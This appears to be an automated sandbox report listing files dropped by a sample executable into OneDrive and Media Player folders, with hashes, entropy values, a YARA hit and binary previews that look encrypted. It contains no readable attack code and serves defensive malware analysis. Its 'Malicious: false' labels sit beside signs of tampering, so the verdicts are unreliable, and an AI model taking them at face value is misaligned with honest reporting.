SHA-512:	37EB99BB5C668561A16109C6CF5C1B6AD5D632ED2318AB97E592C3278A44A7A33B96B1C869816F3BEC71A44A95D98C99A1E364614B9BACD6D5801F787A0C5298
Malicious:	false
Preview:	<?wpl2.E..^......K..ech..c.#.'4.....Nl.\|...."eE.+.9I...P..X]..j`.l.;U0U...U-f...F..o.....L.&C..~...B.B^....X^(..;.y.I!....O...mJ<[.F.[<..[sj.Co....t.....V...{a.%.I....9.0.E.1...>.....n.............x..N....{.g...r.........\...........XG...[.g..g..2..m.S.2j..........(g......#Q0..u.uV....Y..r...>l.0JDz?..I4.o/..N}..e^Ag.A@<vw...B......a.....W_.....O?.LN..v....wN VWk&.&...mUQf.S.\4.y.g9:.?.....Z)0.4.$..[p.B..8.xE=.....Y....\..u.)~.!..P}.?...;.,...9i.J.A..Z.K....3.m.. `>..9.b..x..s.....n....8;=F.f.JkLX....>@....$_awy.......PZ..P...,...4......9..Z....Kf..+..=.v?............Ju.,'.b.k...HC..W,[..`.S.B.$.....H...?...;#...1.!.'.5.Q\|.n.D.U}.?].".'..h..(Ra;....q#...T."...=H...84....}4.....A.8~./...6Z.. .o...Y.X...d..\.QU..%......!.I...\|..&^...G8..1...pm.%w....Q...f...+LZ.P.#5.b.:hQ......qx.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\12_All_Video.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1413
Entropy (8bit):	7.856349423544932
Encrypted:	false
SSDEEP:	24:olOiWNeu/3hCDSNq63i55XuZ+KXadfTmACGSaBCI+Fix2Cad0MbD:Z4u/34SNy44K6n/VMIch3D
MD5:	8E276FA877317ADB683ACDD2B236AB1A
SHA1:	EE21A3C0AA61A72AEBFFB7DE144361B439E3A491
SHA-256:	8095F62DA19AC3D65DE4585F620E75866F4884602E0BF63F0EFEF129EC7835AF
SHA-512:	C6859C014AC5D5ADE015BDD756D0C433BF9CBD75DF93B79AC436000334C0DCBFFE64A60F41A6F66C5EF1846877BAEE019B41F10D1452C8D1B9B13BD8000B2AD2
Malicious:	false
Preview:	<?wpl...<.BC.F..<.~..z@....).j....VvP.:y%)2S..3\|.>....8..8.[......j....Q#Bd.gG..).../.-.Aj#9k..jS...........8.s...2p.J...8J.s.r.e..>.....UP}..)...8[....5.3..y\o.S.Dn.I......I.X..._.;..4.0.5..L.L....,+...VI)....SL.'.."..vY..Bd2....[w?...$3A.'.U....X...p$.E...t....Z..$....A..i..rW....Y]..sz..I....3.v.j+...su.....-.td*...8\..WN.)....^..Zs.`".e../o.b..........$N=..N.(.OG.1.$l.SR\.A..k.v..=.Z.S$.#&.....Onf..E....!...^N`....k.M..#.,:..3x^iz..w2....F..6...>.\|......-..B.=..b.!.2..c..B.......;....5.#.v.g>./.~/...z.....2ZY....(D.1......UH=..#..r`.-.a}0g.U2....}.....4.......tA.K.g^#_iwb.......)...J .#.Is.n.......Dnic.8...Ge;"...[n.5...p.......3.0.[..z..y....... !..}...(..4......In.s....N....;`..v..m..U.h.!M.U.Ij...........m<NuK..><.."f....\|.O...d/........v.......M..@6....!n...%.n.bo..J....e{..W~.u!t...\|i..5....x._..1=..r.f${.....LxcDC4Q`..!..XUt!.H..o.....`7.....e.}....../7u......k..O..U..o;.M....,......A...-.@8.6Ww.x..........K.....n..\|~.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AppBlue.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10576
Entropy (8bit):	7.983210054236107
Encrypted:	false
SSDEEP:	192:2s2OcbYgLtGfSpKmKhHlsregDzHtWmELNkxk/2ffi6hD2fD2m3ufwa7SWN:2LpNLtP90MPHeLaaaK6h2fDXs7Sc
MD5:	B7BD9F1ECC06ADA44520C513B55EE549
SHA1:	3160CC7AEC51BFF3064188B5D0C1CF7875C3EF1D
SHA-256:	0FE620ABE4342A67D02AB1C6D937787088194EBFADF6BC31A08AD1841EFBF9CE
SHA-512:	C87A7772DAA34C5051CA2B94EAF273C5B10B1B20F3BBD591356C8C3EFAB9B877F9AD6C4B1C7565253089BD309CCC889179A09B417716E31E43C992A0CA71E6B7
Malicious:	false
Preview:	.PNG.%...)..t9B...d,3...-p.Z..1F...}e~..I..0"EA...O.^\(.3..9........_Gm.....'...L..y...........\|..<. ?.#.M..N.d......3;.Qd.....K..Ji..ikW.A.Q...^D....y....%..Zi+..z7.n...;0........\..#....O.~.z./Mu.......`...q.M.H.0......1.8.Dh..6..M.+.b8.B...{.mM.D.A.G.%.....Ez....A.....Y...t..A7....-}...9Nh.y...<..1Y^...!]..Q..\......F..#....\|~\.v...~.6v.....o.....L.U.....D.&!...9.n.B..(B."._Cr.......7 ...'%.......R...G61j..%.^....E]._.4.{,..}.<...e,^..;..l.7..f..]....}..... .Q.m....`4{.."S....VX.tN.`.....@...`...b~P=..Q.2.\|[<..{...{..X.o."9...t.u.....mi..py...[w.)...&..;....Ic-r?e.+".L.......s..<.o..8..X "..\..b..I...]!.@>L..-..d.].e3.....1&].q.....=.I}l..OZj.iZ5........dB....f9... . .......+.].}..`()...{..-~.G..../yR.R.........-<....J=...].../i.>...q........G..\.J....:.jB.@.....D.....S&~..{J..qr.Dr..tUJ_%...a..&.9d.e.s...>;o.#..{M.f...V...y..k.U%./..!H.mXih.f.u....+.xq..K.f.^.H..I,......11#..ry....t.\|$.....BjL.......%=m...\|.C........0!.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AppErrorBlue.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6362
Entropy (8bit):	7.971393061617412
Encrypted:	false
SSDEEP:	192:01IpzVPD7nyQDKT0FZhSPLCkQCKwcJZAAAxB:06pRr7yQD1FZ2LzrKwKArL
MD5:	11A76ACA9BD82A0508081603497F3F60
SHA1:	0C1600331FA1DAF84396723D819EAC1E93A1C790
SHA-256:	0835539C15457D86FE65F07F8AA3AC117769C6A7ECD5C7537619F864E9DC0D8A
SHA-512:	74C1BE9BC2690350FDE26DEDF75EC584A4DAEA0AD813669CBD26B990F2699594BDFB2A5CA6566CF73B91972154241BA35BA2A9B527D27D2387E54C2D732DC84C
Malicious:	false
Preview:	.PNG..P.o..<..M.Y2.X..s.....f....;.NB5..[...:.7.F......wjD-Y.....0%.).\.u...`:..;...o.?.AMn.T6:..4h.-.r.....G<..:.=.18..]....u...A.....f]...i..t...B.....3...\|.s.\;.s...W.l.s{..Yd2.#..5..f..[..^.;.....e...)......F.Q.$..QG3..>.lJ]EM.#... .Te..w..>...+......n.....'w..$x3..qn7.H.z-^B.(...!..U.....V......c...8......8._...!mu......U...%u.S..A..J._q...Pown....."......X..35..d..v..T.2...*k..`dr....-.7$.r.. ..d..oD..u... u.L.4M7V....m\|.>..Pz..r.[....z\..........\|B.j.^....mS..z^.5%..R"i.%l.....`.Q.....b....e...ZgI...{.yv.p.V....7..[.f..(...K.J1A._<c...`.../c._qq."....P>.....6.G..a....Q..........}....w"..h..L.Q.p.z.a`nG.....`:W. ...a.......M..h.8..!.Df.d..N).....g.R.7^.s".....&t....~.........XH.[..G_?oQ.t.'...he..%T+8..$Y0.bH..~.V7..i.>...r......9.G...M0.,.o.x.#..^(..K.....^....)....&...k.!...9.cL../.sI.\|...O..K.B<].eH...k.\|L.<\|.......H..... .....8.G.."..9.\|.....L..R~..c.^.t.@.."o..1..h.....[....LE....5Z.f.p.>N..x...:#..'o..[.6.V.....Q.[k..v.A...n

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AppErrorWhite.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5794
Entropy (8bit):	7.9679044157174665
Encrypted:	false
SSDEEP:	96:N782BBjh8eLlQ1wCxPr+cxwV2gGXE51Q52kEPlnFi5/QO7WFPeIguCIIVs:N784dZLlh+r+c6Qg151QEkE9nEWdeIgU
MD5:	15E13F7E46F69E7DF4EA87EB90A2742A
SHA1:	A6B41189ABCEF9A547270B2FAC3E3A473EBED0CB
SHA-256:	0462347D02BC51956DF72A6B11401F43F11B83461A90011F4B3B634F70A8C3B0
SHA-512:	8C4B879932F6BD0857B7EAC1702CF77E0313859EF8883500F62CFEE13A39B84C9D4BA16E95672D51F67EEBD5D2CD1E079391D1A59A45B7A9245C95D5AB064284
Malicious:	false
Preview:	.PNG....z{...S.....GZ.......%0.x\'.&.y)..{.1.......V..N....{....8.Q31.:.9.......d.T.:..R.z.5\|.....".).R..q.d..........sU..J....%....4.H...r...H...3...h.K.......V./_2.....r8..8..!...J..t<m....CI+..#v....P[.N,Z......&..7.^..#..#..(..........P..w}.!.QC...41....Vi.....2.3..q=.&..Q....J.......M.M.C...W..2../.@..?.e.tU,.3.#..Z..u..\..BY.:..uhI~K.........d.o..a...O..~..h...i.....FB...g`.=..y.>s......$.9`<c'.qS.d..d"....&!..m........P....u...Hp.Y.a..Bd1..uq.D"...%.I..8....!...7#4..i..z......,@.5X..Qhq&...w$.L...2.O.52h...M.nM..;.!V..S.\|:8......\.\..5...Edm`\|.-K...Q.,......UV9.c...4.}...H8V.cn.a......ru..3..w"[d.K"?"r.5H.Z...(...N.....I.5k.....7...#..9...._.....].L{e.S}d\|..a.:.op...4=R.).........A..).l..b2...f...3:.nU....-..G..f\.'.s6.~+...e......`..SG.!)..L..D.].. ..GnDH.....F.S..D.[......q...9.c..u.a.RIXkH.a....#.d,.z/........_S^[x....S.....9Y.&.A...2il...........%..I4.v.i...z...@.'..;V\V.h=....Q.(=->.....-..{..@_..V.a.J..4].]+.>..<z..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AppWhite.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4158
Entropy (8bit):	7.951908359162066
Encrypted:	false
SSDEEP:	96:/bWc1UrGrKBoPf0/LY5zbApVsLTnrZJ93ZYFw+2laezR:1mGrKBoPcLCbbvnrhZYFLUhzR
MD5:	AA3F124A6CDC17B4B7370F1AACD97E31
SHA1:	08C772D9CC32E0610D61489366DF7EC94B813DE6
SHA-256:	9B82F4C8556B910DC85651D3596B91F720BB97EF6675BB8F9BBE5C0D217BF740
SHA-512:	1FF58C11F3667613FD8209734735C49C220A1ED9BB42251178D632031A13387FD01EB90C482C8B4210CE1E845D36D72C877792C0C8E3A104B8DFA16804C505B8
Malicious:	false
Preview:	.PNG..`.o3%..<@c..6....-J..:..xB>fg.....Z..$........gy..5......@..A...g.B/.X./"K.~p.E$.82.a....z.......w.8{...NY...j.Y.B.....y...).`..1..P...$.l..9....j...j..=QMbD.`;...c..n.....Z/.o...j...Z...m.z.6...2.o.y.p.....5.<(~xi.4.."W.AGr...... L]..r.9j.....t....'`....Q..[~..2..Jb;,.h...."....z..,Y.!...A\S.g.F...1.......QL..3.aS...f+)".q.KU..F.!%..+...........c.Y@I^mS..'..bN4.~....>>.@...+.!.Fp,J......N........#..&."2.1v.&...v.........R.&.x.C..}N.;..YG.....>....-.......b.}......=39.t.l.p-.;..t:..~.o0_'m.d..l.$..V......#...$...eL.5@.1.....X.#X;.&.uU...<....m*3v..8..;.C_..eD.Q.Q.,.G.N.....m...<..435.+.n...j...._..x.D.v.J...... ....D...cN.Y...C.%i......a.b.g2my.8/3.-#...f..Fu\|-'.v.9.......2L..@......v.#...J.$..#..>..R....4E'............a9.k.@.......KZVA/...d.Z..g.m.Bc..bT.I.....>gC0.\|.A.C..7\|.T.#.\.v...v^(.R^.V.6..4.\|........R..%7N[..m...[.lV..i..pf....&..Uy...W..8.LUN./CJ&U..:~.....A.kZ.L....3q.O.?`Lo.p.G;5w#sZ....h....IWM..%`T3.(...o.....T.`..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 32437 x 10601
Category:	dropped
Size (bytes):	383556
Entropy (8bit):	7.986098286544082
Encrypted:	false
SSDEEP:	6144:BfPzj5hJm803/pF6uQLEhvX8l7FtYXZp7epp+Z7Aj0K7PWH0vl8ee24FHvUbSvbu:tXz880PDKG8lxtY3euZm0KqH8l34Jrju
MD5:	9C0ECEF3A0C55CCD74D67998B35CAFC7
SHA1:	8765C026747DF60B367EC7372F1C547FD68E7E32
SHA-256:	FF7B89D878BD6158ECABA09297337228E523FF835DBC303FA2CBC53556769980
SHA-512:	5AB542B845956F27171CB75D8CD0F5CB3E0379FD1ADC66405F3EAD419B99629909A5628B01F56EBB9C2DDEB7EC4E14428C96BED84589C12BD44EC6810869624F
Malicious:	false
Yara Hits:	Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif, Author: Florian Roth
Preview:	GIF89..~i).+{...lV>`u...z[#.3E.A.=x."...].a9....;..'=.}.:..r..4.[o.C5....Cd.T.v..~..JL...v..U..Q....c'Fp..,..<...;p.K2.L3.g.$:...,...\|.2.`....[o...oV...YE.]......74Qe.-4BX]r......e...c.........a..k .Q^.G.&]...b........5..G....w..M.O...-<.C......Ul.f..~?uB.......g..c.uq.T......FL-...p.....B..MM\|1i.k.^........'..TF..>l.......d`.RvV..]!Xe.......L.Q.!.Z.....)i.J..........Gg-y."..Y.;.Q...b...i6...Z...n.V.g..........k.]..0..6-.:".r..9.t%.1.!.E.....f".....N..M](.x.[...5..Hx.].......4,m<.....C..?Z......k.......,p........k...g.~..@...g....P..&.6q..#".../x#.c..`Mo./.......UR. ..E'.8.5:..J).&..v2.Q!........"...380.HPj..-w....xH...........G.Y.}qjn.OD.QXo3&.b..7.<.j9.o.MApF..L........M.[o^.)y....A..Q.\|OC.b.....E.e.....dCFW;p..0.".4}.!..{....{..y..p..i.....+..H~;...f...."rq<.Vp..:/Z..&u!...;.E...O...v6.1...L../.._{z.&ELQs........X.,.Q.....Mn.1..e.t.0..u..\|.<.~}~&..NrEt.<..V....z7.....H1P%.'..}..?.y....-..{..!e..Sl.DN.EC..4~..)7,..<#...5.;... .J.u.?a6

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10560
Entropy (8bit):	7.982590977121402
Encrypted:	false
SSDEEP:	192:dxext+lNb34qNzCUzEJDu+SXKY4sgN2+6ZFRhIxs655MZiLgWwt:d4xORCUzL+uKYHehmv655NLgT
MD5:	CDDDEC7A2A71B269D7E63C12D9767705
SHA1:	D43232EC583D17D6B81E69A47C53AFF1FDE8556F
SHA-256:	773C392BB2F4A470A7192ED50A4012028F322D013707270ACB8EFB700D7841B8
SHA-512:	C3C3663AA789D3DED817B99E051FCF9D112B98D5F5C5CDD5569F685C2FC16C022AE61D5DF355FB555E68BD2202192FE80BEB020639FBC82402719CEC5E104EBA
Malicious:	false
Preview:	.PNG..N....z..........a...q$.m.&rI.Z.H.+..f.......ib......a.....=Z.S......-3.5l..-.........b.....=qa"....RU7i.8.~R......y..[.$....t.t4...;.@u.'.<v.T..].]"..fR..X. 2Ps...f^...{YTO.h.e...v....omH.<.1..D.r.M...]h...9k.,.I.b.._48rR\|.).....C>w...[........$.."...T......m....ybO..?A.C....9.A<_.Z.f...m{+J@lw.q..X.....S.Za..Y<.%.E.}...:....:..d..u..G....u.Q].qUWei..>.p.{.6.-...+..`...8.^.....5...:...9.w%t...fZ......[..O1.......S.1..qy=6o.:v..Yt..M#.H6.TX....W'9&Wn.y...}k.....b.e..P...Pp......#;e.Pj.d...F..N^..QlyW....[\|....@....g.3E~.v.I.. ".w.%.3q."...L......L........s\|....q_A(]..........+W.c<.t..O@.PPY.....-*..l~.i.7)o.W8.~...E'F...0...7.Xr.h.H.d....Y.4.6.Q.3.L...r.Z..zu/.po.....1....(.P..SPuxO[...q..v.v.h].!n{....v....#.(6.A.;...3Z..PVV$..)....)?0..'...../.TJ.{{.....h$..=.'.M.n....D..`.N..(3N...1'=S....i....C.l..h@'[.".`....j.v.f...tT..6......2.N)f..c..Q9.........p..b.E.s...2.1.'r..N.}..R....L"`...{0.Hag.Yt.F...3..A.}P.:...+..#.J.t...;t...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ElevatedAppBlue.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5028
Entropy (8bit):	7.961097587396169
Encrypted:	false
SSDEEP:	96:fIJMrZLJcoMeMjHpU2lylUrSJhdohk4fC6+LD/G53UlMqf:5lLJcosKJkkRf1f
MD5:	2B61A18F6FD381B471627A2D42CF2CA1
SHA1:	7E8318B12A293BA82744B5A53FD368AF6CF1B385
SHA-256:	DB4204BB7AADC32A2284A42C9972610E5222FE877AF7C17BFA711C9C8DA385F9
SHA-512:	82CAAB0609F4863D7DC0C530EA437C091868A1A71AA4C4A743EA3BE0AC663502AE43F4477A3730477952A899E4A68268E02E6E5263164B27FF067F362138F246
Malicious:	false
Preview:	.PNG...wG.......AG..........9x...........ZE.. .Q..%....sb......x....0?.?...i..LRyrL..w.U.z5._..7."z`s....O.........9..f..2.Y..C.XJ..,.X..v..z....8..n..".l@.H....)....'l..t+..T ."...g.L.....y..,`n....Xs.T........s}...(...<.D.L.7[.^.r...@_{R...w\|..o\|........&I...p.{.!.,.;.......v&....U...D.Y..}"/....>..'.h./.0..R:~..N`.AY..Q?w.\|..L.......i..I.......C.jL.Q.y@....m... .$.\.f...7..Vw0.nW.rs.Z......[H...........6.q..U....o..A.h..d...........'..V"L......W..D......$.....Kb.1.M.N..h.U.].$a..,..T...\8K%.\....A.=U..9.R.m@.B...`....X.c.d5t..\|+..5....4l......E..\|.Uo....P&..>...L..)i...G].^....e....9`b...\..P.^...kE..;.....h....}..O@...*5c.a..x.........+......``,...P~..<.X.d.~q.V..N..E....eu.D/.a..._.3..%...+...vFE.Pw.Q}.4..k.,..;..DG%...H.y ^.jg....b.......h.Ov.r......W>...Yj....f.\.?w.w....+.2.D...Yy..F..K.D...2Q_.:...a..._.2.,.I.N......K.....\|.......1..-.l.aG.\|..@b..o..a.0..9...y.S4..zuk..v5...f.r..;._....L...S.H.a.{".U.k#~~^...Q7.Y.FA~.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ElevatedAppWhite.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4540
Entropy (8bit):	7.960518734794481
Encrypted:	false
SSDEEP:	96:/n35N+gs/zPo4gCe98Y9EwTmJ8V/kr7O4yEuJpjJ7E8jij:f3/7QP51KEwY8ZkfOTvy
MD5:	3E5788A6208E7B2DCB20B31913E5C154
SHA1:	74A2F310A6F509312745D94EBCE2FCD078C94D01
SHA-256:	AED3F92EE4FA3549FBC0707A277ABB2EEEB84DF27D877DBAE8B7E2FFB99873C9
SHA-512:	BC20CBAF060A698FCE612FFAE20873188C8CD7160F14AE2BD002B4EAF1CB3CE005F90D7AA099D8A21A5268874939C029B9BFC682E9742B8724C8E4610AE71A1E
Malicious:	false
Preview:	.PNG......Cf.J)..~>...7+..&...0..ox-....vJ._.6.bt..R...+...^...a.R.,...........97.~._...=.....[0R............Sl..Vg.4%j...2=xt..],.........k.0.c.O.f..C....<..C2...0....9......$....b..6e7.n..[;!5.}b.V.b:d6.r".].Z....,.:..in..g'.....j-l.l.8...V..=.../.V...[xb....&.S..8..".]/9$.2.k..@.U%..6o\|.. .?c....)G..(`....f..K;........d.k..N/.7{u9..*.D...z'b..y.%v<^.-[..A.....;..z.h.c.B.......\|.\[.A.&m..0..dus.\.m.;..9...p~....YX.......R../..z..../.$....)...oI..V..t.c....R.&.......=..%....?.y.S..q.".^l.Gf.$.DQD.}.b..TRN>P.f....P.{i.-...8...s.5Q.7.6...8..........-O.3".....y..D.G..<.. .'.\MtL..J..xu......w.Q.PY...{W~.c..Z...e..P.f::...!........cB.N..(\.3...E......._.4"!..!E&.x.7...?.IPK,...%.....R.5....]..._,>T>{..2wv..Dj5Z>..Q......!.O.%......?KM...^!..'....bD2...AF8..j.}..>)K8oI."..c...5.....l;..G.......Fsd.~.hV..:.......d.,..UG../A1..L.....j!....A......G.OVv.^.V...G....b..yV.....#......d.V$)".U...Bv.....k......KY...0t}N.._NGK.-y..pR4...F..UnKW]...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\Error.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7936
Entropy (8bit):	7.976190966046457
Encrypted:	false
SSDEEP:	192:TVtYrrj3yQGTj6C4TEz53XQvfHqqdjyIElfxFgeWXUr:/Yrrj3XejkSQfTd0dr
MD5:	6034904F37A0C3221002D041085E217D
SHA1:	B35BAD5DBC770157B61E5378706A9C45BD1150BE
SHA-256:	ED060276ACB8C230A4208BA8C3A1B5CBD62DE09E88DDF1BDD5917D67903BD0C1
SHA-512:	F3B5405E69C8101491237FDF6DB9FEE0D396AC211F92F69E7EDE3D44466CD9D32B7B26C37A7411581257556E1344068467D430369E8A0CC1DDCA5711DF07AA41
Malicious:	false
Preview:	.PNG....d\|j8.+.......f...~.O...R..Bj.F..J`.;.@...x.+...qq...../c..0...U.b..+..<..H..`-...x........m..>05{...O.S>..k.H...a....E.eU.......`.....s....R...sI6...7v..I.F..5w..S..........r.\|.`....5M.z.G...=F.........L......S..mu.Ke...)f....9..[Y>...Jn.e"6=........@s._Z.]......+.<....n....~.=m.W....<.g..g.Y..1.._.B...Pi.....,...V#9.0.B.o.....=.........=`i't..VF..8..~.z...C.\..\|....\|..S...~.A..........fMl.4...j=.Lhu!}V...\|.T.....9..o....5..V..(..C...l.....@l..I.ak...?....(M.E.............l...7....}.s.UMKC.;<E }a(MP...@&..f..`..<e..g.oXN5.W...L..u=..=.......?.vX....ZzJ..QP.W.o.x\|TD..^...ff..46^.n...w'gl......A)9 xW4....J..(..........y....t.)...C.K]<zw.p.ilS....u/..^.z..s>...u...........9.9.K.G..8..+........w^..+xO\|.e..3I.HIe..........t,q..>..Rm. .%.B..:.\|>.g....I....w..Q.K...6....3..D..'n<.cJ..9..,..5.Y.7.^S.` .#`..E9P..9...!S..eR.U.P+.8.0..OAT.q...W&....i.H.........rmV.Xv..O.uRk%R........y.. .]VmJ.tE...\|pa.J...U..3...Fp....\hiBe...6q.~._@...a/

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ErrorPage.html

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6519
Entropy (8bit):	7.972168279022665
Encrypted:	false
SSDEEP:	96:HMXgpENJIy0jimvJlhY85dDknpzwPzp6BedwdkB+7JiaPa+wqHWCq+bUnkSNfl+1:HMNZRmvJJV4pkIUdwdk5lqgkS+DHJl
MD5:	404386971B9B9102EF2E7DE0B32DE840
SHA1:	0CCBCD6CCAFAD70350C184AD327ABA67C7D369F8
SHA-256:	7F103D9A6E3FAAB109E64170058549F06DE40C7C9058D075074A73949C588931
SHA-512:	A7ACB0D5B58129951DCB534CF0058E310FAF333168554B65138E600C4E6A5B2D25B6F43488392FCDADF94B2FC65E21512FCC1B0F8CD54D20AF782A3FF5A58D40
Malicious:	false
Preview:	<!DOCR.-i5\C.X...D.U[.............L..y.D.n<......K...`.]..&W.y.M.........V.im..{-..^c.s.!.6..P....D.>.S."..1...?7K@M....q..[.?....<.0C{....#..M....d.&.KW8.=.2v. ^I.R.v.1.2...O@..C..q.M..$..T..V.......s:.M.!..........e.Y.x.........9".x...r...D.D..w.f.........m....;b......`.:{....1.r..N;.=..$...Q(nr..+?SY.(..Q...1....}...h>ER9O..~.z.S.U.Y.+.vo.z.c.z.9.{M.....\|...i...d.D. JXa.jg....c.r?qa...1......7...?.].9U..x.c....`..p.:.v.....i......'f...;..nw;S...R....`.q..cv.j..".-.....Z..k.$....r....8..B......V..3nASd......`VCW..T4j..Ev..d.pMLg.....i...f....u.N.9>...h..M...Wm.S+_..^C.....O~...C.9....L......i..H4.....C4Z..\|%w..a9...$N,.U.#.Yw.P.8............\|..J.F....A...Y.......U......2.......\.H sg.....z.......(.e..V..cac...X.\| 9.t..3.-.h...2...,3#.. tMO.?{......Z...j;IJ..R.s.m`?P#N-!@<.?..s2..5.m=.#W.....`..K...NgK...-......%..X}f............K....f...r.h.B_..-UC.....J.v.vs....SHY....C8..)......`....r..^#.>.;.8...*i..'......0...^SGi.c..P?\|T\.../.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	507518
Entropy (8bit):	6.917981645637591
Encrypted:	false
SSDEEP:	12288:xeFLCIFAvmxFpWeN2HIrgI96ME8fVZ0jGMj6wevus7H:xe9FAvmxPWikOIoVCj9BevXH
MD5:	F9B1E452E46938976A309A75A72AD229
SHA1:	AF61FA95831624B6A5DBFD42453A22E8C55CB140
SHA-256:	E54125D3A05B18ED3215F15E0617AE2035864636E7C235C1203551D8B74A3945
SHA-512:	586254BDCF23B0825EAE4626736ACBDC5A0AB185D81F61395F09A93D6FB1C85AF072441F10D5ACAD16AAEB18BBD4CE6BAE89BDA7077C1BEEDA4CBCAF8DD03368
Malicious:	false
Preview:	MZ.....$k9.%`...._.?.S.#...HM....'..D@%.&.v..U#C.Sj`9w.o.'..\|.).....i....:..h..Ny.h}U.=.@.m...#s..H3..\T_.7.,.+.Ys./e..r@`..k,..uI....0.i.%.ga..D....>...&K.:.!....<.T(.(...`..U..c!..nY..v.nb..d.{4.5....[\|.L.>8.>.C..M..8.......s:s...........2.......5-.%..F,.9.@.J......B...9....8.>...y....6)%2....cc...+....h\|m".......g._~.-..w.....,.i..<...{.....O......'a{......K.0.....S.q.........j.w-.....R}4......A._...-.%0.b..{q.sx.,.0s.\.....0..Ep...n.x..tks...L.....Q.].F...1._.C...g.}J?....'..'.+., ...>z-..?t.;...\.un.nxh..f......J.~....6.3...?.....h...b#-\.5.u.@a3.USH......6.Q..?!...7...RG;#....]G..f.....f....2....6.....5..._....lpj.X.{5.G...........t..a..8..R..?.[.6.).7........1}."E.UE.{%.....6.Ao\|.F.mH....}.=M'.5.d..\..h..s..T...X.V.2F.[..h.......R..~...(.g......2.......nIs.....w5R...........y..;.TT..x.....R...........Z.....-.[..K....R....:".TU..?O...,.8.D5.V.m.J&..B./.....+@]......Y#;..j........d..N-X.9'.Gh....F........%-L..M.>.Wn..)k...&..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	313990
Entropy (8bit):	7.3463287993182025
Encrypted:	false
SSDEEP:	6144:4KK8Mg7TDmUSIYFSPfGvrgUuF/sBEeElGBY5K4:4n8/mUSIYFmfmbysmWYc4
MD5:	C13F20389E28EEBFC486DA5570F904ED
SHA1:	6D3954552D92E18A02521F2921EA6E2BFD726A89
SHA-256:	041CEA253A38F67C747D39B5A15C4EE8F8186FC77FE274D151AE516B5939D697
SHA-512:	AFF96B9FF1070451ABE841172B485EE59F8CFFC349CE12B3718AFA33672EB56571C3BEBD81CCE63A1CDCB083A66CF5A07FEA6FAFF88237674EF4260EDA7E3583
Malicious:	false
Preview:	MZ....ae...6.....$.m...>.t`..A..._....g.mTB..a....OG.(...r..II......0_.a...V...9HX8...[..3...YI...YS....t.n..Dnn.B........Bt..d......n..m..X$.~...P...#..r~j$...^..W...JtR...Ah..(J.m.....O\|...Va.7y..I[....K........J..t..a.i...<3Q_A.tarI.uY}.:.A.......Xi.....L2..$<x>.^+.y>=w.cP5......G..'....x.#.k..gs.K..............&..D...+..L..S.BQ...3:"d...i........%......J.y......VA. .)..H..OhR...p5Q_..A...W~.....;j.D..U......h....xI>.V.J..."x[Z...2K......X..:...D......j.YLM~..i\&.0.Nz-N GO.q..UZ..q.b..#.X:....R.N....?.b-`]..h;.Q..B.G5R....>.}..^.~..r.}j.K.p.u...i..\|v.Q.l.n..o..}.+f.+..<6Re.......\..i.X.,`6..&.e..K.J...N]b..Wup..r...@Z.A.........U=.r...RkStvOK\|.......j .Nz..4..!..9.U".v.....-..K.."H.Xn...._.......nH.L..>^..q.q.0.??..9. R...B.....U...z..s.*.'.6.....V.u.~R%~Y.n...i./...6...(L......EC[vs.\|u..;...\.,...8-R.e. .V...,..T.:.#(A~..1...gsL..<.H....Mc....'.cn}..0&...6}w!(^.$.!r.z.\|.d........TSB ..t.F......../....:...............u9..:

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2109062
Entropy (8bit):	6.883016429350654
Encrypted:	false
SSDEEP:	49152:LOXkzUQ2eHpG690eiVBj4ItA2Q2hRD5zNrEE8pqA7SD1dQMWtT0co8GK3xiFolJq:aDeHpgeiVJR5JrEE8E38G3
